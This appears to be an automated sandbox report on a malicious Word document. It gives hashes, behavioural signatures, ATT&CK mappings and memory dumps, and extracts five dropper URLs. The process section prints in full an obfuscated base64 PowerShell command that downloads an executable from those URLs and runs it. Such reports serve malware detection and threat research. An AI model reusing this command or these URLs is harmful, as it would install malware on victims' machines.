9cd061986718346b19c1a06298768c018c8a52599582c848583d354567a28f83

General

Target

9cd061986718346b19c1a06298768c018c8a52599582c848583d354567a28f83.doc
Size

205KB
MD5

7370d873691ecf8da1967f2baadcd0d3
SHA1

38e0139a300e0d3a01fb2a5532924a5bae1e2bb8
SHA256

9cd061986718346b19c1a06298768c018c8a52599582c848583d354567a28f83
SHA512

6b181320396a24169efdcbbf0fa1bbc7b7e5e5cfdafff8b98c54dc94bf1eb4dc26221794023340d8eb09d467edc6c1b6b25424f8914ca6a5dfbaa3ae481ddd6d

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://ryedalemotorhomes.co.uk/wp-admin/RQ_g/

exe.dropper

https://villasantina.nl/y2nch7d/Rg_XV/

exe.dropper

http://maxmacpc.co.il/js/Yz_7/

exe.dropper

http://manioca.es/wp-content/W8_m/

exe.dropper

http://sarayaha.com/ad/hf_0/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

PoWeRsHelL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	1852	PoWeRsHelL.exe

Blocklisted process makes network request 5 IoCs

Processes:

PoWeRsHelL.exe

flow pid process

4 4492 PoWeRsHelL.exe
10 4492 PoWeRsHelL.exe
13 4492 PoWeRsHelL.exe
15 4492 PoWeRsHelL.exe
17 4492 PoWeRsHelL.exe

flow	pid	process
4	4492	PoWeRsHelL.exe
10	4492	PoWeRsHelL.exe
13	4492	PoWeRsHelL.exe
15	4492	PoWeRsHelL.exe
17	4492	PoWeRsHelL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4628 WINWORD.EXE
4628 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

PoWeRsHelL.exe

pid process

4492 PoWeRsHelL.exe
4492 PoWeRsHelL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

PoWeRsHelL.exe

description pid process

Token: SeDebugPrivilege 4492 PoWeRsHelL.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

4628 WINWORD.EXE
4628 WINWORD.EXE
4628 WINWORD.EXE
4628 WINWORD.EXE
4628 WINWORD.EXE
4628 WINWORD.EXE
4628 WINWORD.EXE

pid	process
4628	WINWORD.EXE
4628	WINWORD.EXE

pid	process
4492	PoWeRsHelL.exe
4492	PoWeRsHelL.exe

description	pid	process
Token: SeDebugPrivilege	4492	PoWeRsHelL.exe

pid	process
4628	WINWORD.EXE
4628	WINWORD.EXE
4628	WINWORD.EXE
4628	WINWORD.EXE
4628	WINWORD.EXE
4628	WINWORD.EXE
4628	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cd061986718346b19c1a06298768c018c8a52599582c848583d354567a28f83.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4628

C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe
PoWeRsHelL -e JABxAFoAQQBHAEEAXwBBAFEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAWgAnACwAJwBEAEQAWgAnACwAJwB4AEEAJwApADsAJABGADQAQwBBAEEAWgBBACAAPQAgACcANAA5ADcAJwA7ACQAYwBHAFUAdwBBADQAWgA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAdwB4AHcAJwAsACcAQQBBACcALAAnAHcAJwApADsAJABNAEEAQQB3AHgAQQBBAEQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYANABDAEEAQQBaAEEAKwAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeABlACcALAAnAC4AJwApADsAJABmAEEAWgBRAEQAQQA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGsAQwB3ACcALAAnAEQAeAAnACkALAAnAEEANAAnACwAJwBDACcAKQA7ACQAbwBHAFoAQQBDAEEAMQA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBgAEUAYABUAGAALgBXAEUAYgBjAGwAaQBFAG4AdAA7ACQAaQBRAGMAUQBBAFUAQQA0AD0AKAAiAHsAMgA2AH0AewAyADIAfQB7ADEAMAB9AHsAMQA4AH0AewAzADcAfQB7ADIANwB9AHsAMwA0AH0AewAzAH0AewAzADYAfQB7ADUAfQB7ADAAfQB7ADMANQB9AHsAMwA4AH0AewAxADUAfQB7ADMAMAB9AHsAMgA1AH0AewAyADEAfQB7ADEAfQB7ADIANAB9AHsAMgAwAH0AewAxADMAfQB7ADIAOQB9AHsAMQA3AH0AewA4AH0AewAzADEAfQB7ADEAMQB9AHsANAB9AHsAMgB9AHsANwB9AHsAMwAzAH0AewA5AH0AewAyADgAfQB7ADMAMgB9AHsAMQAyAH0AewAxADYAfQB7ADEAOQB9AHsAMgAzAH0AewA2AH0AewAxADQAfQAiAC0AZgAoACIAewAzAH0AewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcALwAvAHYAJwAsACcAOgAnACwAJwBpACcALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcAUgBRAF8AZwAvACcALAAnAGgAdAB0AHAAcwAnACwAJwBAACcAKQApACwAJwAvAHkAJwAsACcALwAvACcALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAawAvACcALAAnAHcAcAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBpACcALAAnAC0AYQBkAG0AJwApACkALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAXwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwA3AC8AQABoAHQAJwAsACcAdAAnACkALAAnAHAAOgAnACkALAAnAC8AJwAsACcALwAnACwAJwBtAGEAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGMAJwAsACcALgBjAG8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBzAC8AJwAsACcALgBlACcAKQAsACcAZQBkAGEAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBZAHoAJwAsACcAcwAvACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgAnACwAJwBuAHQAZQAnACkALAAnAHQAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAC8AJwAsACcAbQBhAHgAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwAvACcALAAnAGYAXwAwACcAKQAsACcAaAAnACkALAAnAG4AdAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBXADgAXwAnACwAJwBtAC8AQABoAHQAJwApACkALAAnAHAAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAbAAnACwAJwBlAG0AbwAnACkALAAoACIAewAzAH0AewAwAH0AewAxAH0AewAyAH0AIgAtAGYAIAAnAGEAJwAsACcAaABhAC4AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBvAG0ALwAnACwAJwBjACcAKQAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACcAdABwACcALAAnADoALwAvACcALAAnAHMAYQByAGEAeQAnACkAKQAsACcAOgAvACcALAAnAC4AbgBsACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAeQAnACwAJwAvAC8AcgAnACkALAAnAHQAcAA6ACcALAAnAHQAJwApACwAJwBhAGQAJwAsACgAIgB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiACAALQBmACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBkAC8AJwAsACcAZwBfAFgAVgAnACwAJwBSACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAdAAnACwAJwBAAGgAdAAnACkALAAnAC8AJwAsACcAMgBuACcALAAnAHAAJwAsACcAYwBoADcAJwApACwAJwBuAGEAJwAsACcAaAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBlAHMALgBjACcALAAnAG0AJwApACwAJwBvACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAdwAnACwAJwBwAC0AYwAnACkALAAnAG0AYQBjACcALAAnAGkAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAC4AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAagAnACwAJwBpAGwALwAnACkAKQAsACcAbwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBvAGMAYQAnACwAJwBuAGkAJwApACwAJwBvAC4AdQAnACwAJwBsAGwAJwAsACcAbgAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBoACcALAAnAHQAbwByACcAKQAsACcAYQBzAGEAJwApAC4AIgBTAGAAUABsAGkAVAAiACgAJwBAACcAKQA7ACQAQQBEAEEAXwBEAEMAdwA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAVAAnACwAJwBHAG8AVQAnACwAJwAxAEEAQQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABKAGMAWgBBAEEARAAgAGkAbgAgACQAaQBRAGMAUQBBAFUAQQA0ACkAewB0AHIAeQB7ACQAbwBHAFoAQQBDAEEAMQAuACIARABvAFcATgBMAE8AQQBgAGQAZgBgAGkAYABMAEUAIgAoACQASgBjAFoAQQBBAEQALAAgACQATQBBAEEAdwB4AEEAQQBEACkAOwAkAFUANABYAG8AQQBBAGsAPQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcARABVAGMAJwAsACcAVQBHAF8AJwAsACcARwAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQATQBBAEEAdwB4AEEAQQBEACkALgAiAEwARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgA4ADQAMQA2ACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAE0AQQBBAHcAeABBAEEARAA7ACQASABjAEIAUQB4AFgAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBRAEEAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBwACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAUQBEACcALAAnAEEAQQAnACkAKQApADsAYgByAGUAYQBrADsAJABUAEEAQgBCAEQAUQBfAGsAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcARABHADEAJwAsACcAdwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAbwBCAEIAJwAsACcAVQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABBAEcAQQBBAEEAQQBEAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAMQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBBAFgAVQAnACwAJwB6ACcAKQAsACcARAAnACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4492-140-0x000002CAD8D50000-0x000002CAD8D72000-memory.dmp

Filesize
136KB

Download
memory/4492-142-0x00007FF86D8B0000-0x00007FF86E371000-memory.dmp

Filesize
10.8MB

Download
memory/4492-141-0x00007FF86D8B0000-0x00007FF86E371000-memory.dmp

Filesize
10.8MB

Download
memory/4628-135-0x00007FF858590000-0x00007FF8585A0000-memory.dmp

Filesize
64KB

Download
memory/4628-136-0x00007FF858590000-0x00007FF8585A0000-memory.dmp

Filesize
64KB

Download
memory/4628-137-0x00007FF855F70000-0x00007FF855F80000-memory.dmp

Filesize
64KB

Download
memory/4628-138-0x00007FF855F70000-0x00007FF855F80000-memory.dmp

Filesize
64KB

Download
memory/4628-139-0x000002C65D780000-0x000002C65D784000-memory.dmp

Filesize
16KB

Download
memory/4628-132-0x00007FF858590000-0x00007FF8585A0000-memory.dmp

Filesize
64KB

Download
memory/4628-133-0x00007FF858590000-0x00007FF8585A0000-memory.dmp

Filesize
64KB

Download
memory/4628-134-0x00007FF858590000-0x00007FF8585A0000-memory.dmp

Filesize
64KB

Download
memory/4628-144-0x00007FF858590000-0x00007FF8585A0000-memory.dmp

Filesize
64KB

Download
memory/4628-145-0x00007FF858590000-0x00007FF8585A0000-memory.dmp

Filesize
64KB

Download
memory/4628-146-0x00007FF858590000-0x00007FF8585A0000-memory.dmp

Filesize
64KB

Download
memory/4628-147-0x00007FF858590000-0x00007FF8585A0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads